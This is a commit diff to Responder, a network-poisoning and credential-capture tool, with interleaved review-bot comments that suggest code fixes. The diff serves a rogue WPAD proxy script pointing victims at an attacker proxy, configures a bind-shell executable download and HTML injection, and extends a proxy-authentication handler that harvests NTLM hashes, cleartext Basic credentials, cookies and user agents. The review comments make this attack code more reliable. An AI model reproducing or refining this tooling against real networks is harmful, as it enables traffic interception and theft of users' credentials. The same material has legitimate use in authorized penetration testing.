Firefox blacklisted on WPAD since it doesn't honor fail-over proxies. Added SO_LINGER to send RST when close() is called.

This commit is contained in:
lgandx 2016-09-11 13:07:44 -03:00
parent 23151fee42
commit 29ad8a0816
5 changed files with 56 additions and 14 deletions


@ -42,11 +42,11 @@ RespondToName =
; Specific IP Addresses not to respond to (default = None) ; Specific IP Addresses not to respond to (default = None)
; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10 ; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10
DontRespondTo = DontRespondTo =
; Specific NBT-NS/LLMNR names not to respond to (default = None) ; Specific NBT-NS/LLMNR names not to respond to (default = None)
; Example: DontRespondTo = NAC, IPS, IDS ; Example: DontRespondTo = NAC, IPS, IDS
DontRespondToName = DontRespondToName = ISATAP
; If set to On, we will stop answering further requests from a host ; If set to On, we will stop answering further requests from a host
; if a hash hash been previously captured for this host. ; if a hash hash been previously captured for this host.
@ -79,7 +79,7 @@ ExeFilename = files/BindShell.exe
ExeDownloadName = ProxyClient.exe ExeDownloadName = ProxyClient.exe
; Custom WPAD Script ; Custom WPAD Script
WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY RespProxySrv:3128; PROXY RespProxySrv:3141; DIRECT';} WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "ProxySrv")||shExpMatch(host, "(*.ProxySrv|ProxySrv)")) return "DIRECT"; return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141; DIRECT';}
; HTML answer to inject in HTTP responses (before </body> tag). ; HTML answer to inject in HTTP responses (before </body> tag).
; Set to an empty string to disable. ; Set to an empty string to disable.
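Review bot: The comment two lines above the changed `DontRespondToName = ISATAP` still reads `(default = None)`, which the new default contradicts; it should become `; Specific NBT-NS/LLMNR names not to respond to (default = ISATAP)`. The example line under it also names the wrong key (`DontRespondTo` where the setting is `DontRespondToName`), so `; Example: DontRespondToName = NAC, IPS, IDS` would make the pair consistent. Nothing on the page says why ISATAP is excluded by default, so a one-line reason next to the value would spare the next reader a guess.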


@ -20,7 +20,7 @@ import ssl
from SocketServer import TCPServer, UDPServer, ThreadingMixIn from SocketServer import TCPServer, UDPServer, ThreadingMixIn
from threading import Thread from threading import Thread
from utils import * from utils import *
import struct
banner() banner()
parser = optparse.OptionParser(usage='python %prog -I eth0 -w -r -f\nor:\npython %prog -I eth0 -wrf', version=settings.__version__, prog=sys.argv[0]) parser = optparse.OptionParser(usage='python %prog -I eth0 -w -r -f\nor:\npython %prog -I eth0 -wrf', version=settings.__version__, prog=sys.argv[0])
@ -77,6 +77,16 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer):
pass pass
TCPServer.server_bind(self) TCPServer.server_bind(self)
class ThreadingTCPServerAuth(ThreadingMixIn, TCPServer):
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
TCPServer.server_bind(self)
class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer): class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
def server_bind(self): def server_bind(self):
MADDR = "224.0.0.251" MADDR = "224.0.0.251"
@ -113,6 +123,7 @@ ThreadingUDPServer.allow_reuse_address = 1
ThreadingTCPServer.allow_reuse_address = 1 ThreadingTCPServer.allow_reuse_address = 1
ThreadingUDPMDNSServer.allow_reuse_address = 1 ThreadingUDPMDNSServer.allow_reuse_address = 1
ThreadingUDPLLMNRServer.allow_reuse_address = 1 ThreadingUDPLLMNRServer.allow_reuse_address = 1
ThreadingTCPServerAuth.allow_reuse_address = 1
def serve_thread_udp_broadcast(host, port, handler): def serve_thread_udp_broadcast(host, port, handler):
try: try:
@ -160,6 +171,17 @@ def serve_thread_tcp(host, port, handler):
except: except:
print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running." print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."
def serve_thread_tcp_auth(host, port, handler):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServerAuth((settings.Config.Bind_To, port), handler)
server.serve_forever()
else:
server = ThreadingTCPServerAuth((host, port), handler)
server.serve_forever()
except:
print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."
def serve_thread_SSL(host, port, handler): def serve_thread_SSL(host, port, handler):
try: try:
@ -207,7 +229,7 @@ def main():
if settings.Config.ProxyAuth_On_Off: if settings.Config.ProxyAuth_On_Off:
from servers.Proxy_Auth import Proxy_Auth from servers.Proxy_Auth import Proxy_Auth
threads.append(Thread(target=serve_thread_tcp, args=('', 3128, Proxy_Auth,))) threads.append(Thread(target=serve_thread_tcp_auth, args=('', 3128, Proxy_Auth,)))
if settings.Config.SMB_On_Off: if settings.Config.SMB_On_Off:
if settings.Config.LM_On_Off: if settings.Config.LM_On_Off:
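Review bot: ThreadingTCPServerAuth.server_bind repeats the whole body of ThreadingTCPServer.server_bind, including the bare `except: pass` around the interface bind and the unnamed option number 25, only to add one setsockopt call; making it `class ThreadingTCPServerAuth(ThreadingTCPServer):` whose `server_bind` sets SO_LINGER and then calls `ThreadingTCPServer.server_bind(self)` keeps the two classes from drifting apart (allow_reuse_address would then be inherited as well). The bare `except:` also hides a failed interface bind, so a binding problem surfaces later as an unexplained error from serve_forever; narrowing it to `except socket.error:` keeps the best-effort intent without swallowing everything. Whether the SO_LINGER value set on the listening socket carries over to accepted connections is platform-dependent (inherited on Linux, not guaranteed by POSIX), which deserves a comment beside the setsockopt such as `# SO_LINGER(1, 0): close() sends RST instead of FIN; relies on accepted sockets inheriting it (Linux) -- confirm on other platforms`. serve_thread_tcp_auth is a copy of serve_thread_tcp with the server class swapped; a server-class parameter on serve_thread_tcp would avoid the second copy of the same bare `except:` and error message.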


@ -1583,3 +1583,4 @@ class SMB2Session2Data(Packet):
]) ])


@ -14,9 +14,9 @@
# #
# You should have received a copy of the GNU General Public License # You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>. # along with this program. If not, see <http://www.gnu.org/licenses/>.
import struct
from SocketServer import BaseRequestHandler, StreamRequestHandler from SocketServer import BaseRequestHandler, StreamRequestHandler
from base64 import b64decode from base64 import b64decode
import struct
from utils import * from utils import *
from packets import NTLM_Challenge from packets import NTLM_Challenge
@ -103,9 +103,26 @@ def GrabReferer(data, host):
return Referer return Referer
return False return False
def SpotFirefox(data):
UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
print text("[HTTP] %s" % color("User-Agent : "+UserAgent[0], 2))
if UserAgent:
IsFirefox = re.search('Firefox', UserAgent[0])
if IsFirefox:
print color("[WARNING]: Mozilla doesn't switch to fail-over proxies (as it should) when one's failing.", 1)
print color("[WARNING]: The current WPAD script will cause disruption on this host. Sending a dummy wpad script (DIRECT connect)", 1)
return True
else:
return False
def WpadCustom(data, client): def WpadCustom(data, client):
Wpad = re.search(r'(/wpad.dat|/*\.pac)', data) Wpad = re.search(r'(/wpad.dat|/*\.pac)', data)
if Wpad: if Wpad and SpotFirefox(data):
Buffer = WPADScript(Payload="function FindProxyForURL(url, host){return 'DIRECT';}")
Buffer.calculate()
return str(Buffer)
if Wpad and SpotFirefox(data) == False:
Buffer = WPADScript(Payload=settings.Config.WPAD_Script) Buffer = WPADScript(Payload=settings.Config.WPAD_Script)
Buffer.calculate() Buffer.calculate()
return str(Buffer) return str(Buffer)
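Review bot: SpotFirefox indexes `UserAgent[0]` in the print on its second line before the `if UserAgent:` guard, so a request whose headers carry no User-Agent raises IndexError instead of falling through to the normal WPAD answer; the guard has to come first. WpadCustom then calls SpotFirefox twice (`if Wpad and SpotFirefox(data)` and again `if Wpad and SpotFirefox(data) == False`), which logs the User-Agent and both warnings twice for every Firefox request and runs the header regex twice; one call whose result selects the payload avoids that. GrabUserAgent in servers/Proxy_Auth.py has the same unguarded `UserAgent[0]`. WpadCustom's body continues past the end of the hunk.
```python
def SpotFirefox(data):
    UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
    if not UserAgent:
        return False
    print text("[HTTP] %s" % color("User-Agent : "+UserAgent[0], 2))
    if re.search('Firefox', UserAgent[0]):
        # … unchanged: the two [WARNING] prints …
        return True
    return False

def WpadCustom(data, client):
    Wpad = re.search(r'(/wpad.dat|/*\.pac)', data)
    if Wpad:
        if SpotFirefox(data):
            Payload = "function FindProxyForURL(url, host){return 'DIRECT';}"
        else:
            Payload = settings.Config.WPAD_Script
        Buffer = WPADScript(Payload=Payload)
        Buffer.calculate()
        return str(Buffer)
    # … unchanged: rest of WpadCustom (outside the hunk) …
```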


@ -19,6 +19,10 @@ from HTTP import ParseHTTPHash
from packets import * from packets import *
from utils import * from utils import *
def GrabUserAgent(data):
UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
print text("[Proxy-Auth] %s" % color("User-Agent : "+UserAgent[0], 2))
def GrabCookie(data): def GrabCookie(data):
Cookie = re.search(r'(Cookie:*.\=*)[^\r\n]*', data) Cookie = re.search(r'(Cookie:*.\=*)[^\r\n]*', data)
@ -59,13 +63,15 @@ def PacketSequence(data, client):
if Packet_NTLM == "\x03": if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Auth)) NTLM_Auth = b64decode(''.join(NTLM_Auth))
ParseHTTPHash(NTLM_Auth, client, "Proxy-Auth") ParseHTTPHash(NTLM_Auth, client, "Proxy-Auth")
GrabUserAgent(data)
GrabCookie(data) GrabCookie(data)
GrabHost(data) GrabHost(data)
return False return False #Send a RST with SO_LINGER when close() is called (see Responder.py)
else: else:
return False return False
elif Basic_Auth: elif Basic_Auth:
GrabUserAgent(data)
GrabCookie(data) GrabCookie(data)
GrabHost(data) GrabHost(data)
ClearText_Auth = b64decode(''.join(Basic_Auth)) ClearText_Auth = b64decode(''.join(Basic_Auth))
@ -90,12 +96,7 @@ def PacketSequence(data, client):
return str(Response) return str(Response)
class Proxy_Auth(SocketServer.BaseRequestHandler): class Proxy_Auth(SocketServer.BaseRequestHandler):
def server_bind(self):
self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
self.socket.bind(self.server_address)
self.socket.setblocking(0)
self.socket.setdefaulttimeout(1)
def handle(self): def handle(self):
try: try:
@ -106,3 +107,4 @@ class Proxy_Auth(SocketServer.BaseRequestHandler):
except: except:
pass pass
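Review bot: The comment added to `return False` in PacketSequence reads as if the return value sends the RST, but nothing on that line does; the RST comes from the SO_LINGER(1, 0) option that Responder.py sets on the listening socket, which only has an effect if accepted sockets inherit it (true on Linux, not guaranteed by POSIX) and only when the connection is actually closed, presumably by handle() after this return (handle's body is outside the hunk). A wording that matches what happens is `return False  # no response; when the socket is closed afterwards, the SO_LINGER(1, 0) set in Responder.py turns that close into a RST (inherited on Linux; confirm elsewhere)`. Note also that an exception raised from GrabUserAgent inside PacketSequence is swallowed by the `except: pass` at the end of handle, so a malformed request ends the connection silently with nothing logged; a narrower except with a log line would make such cases visible.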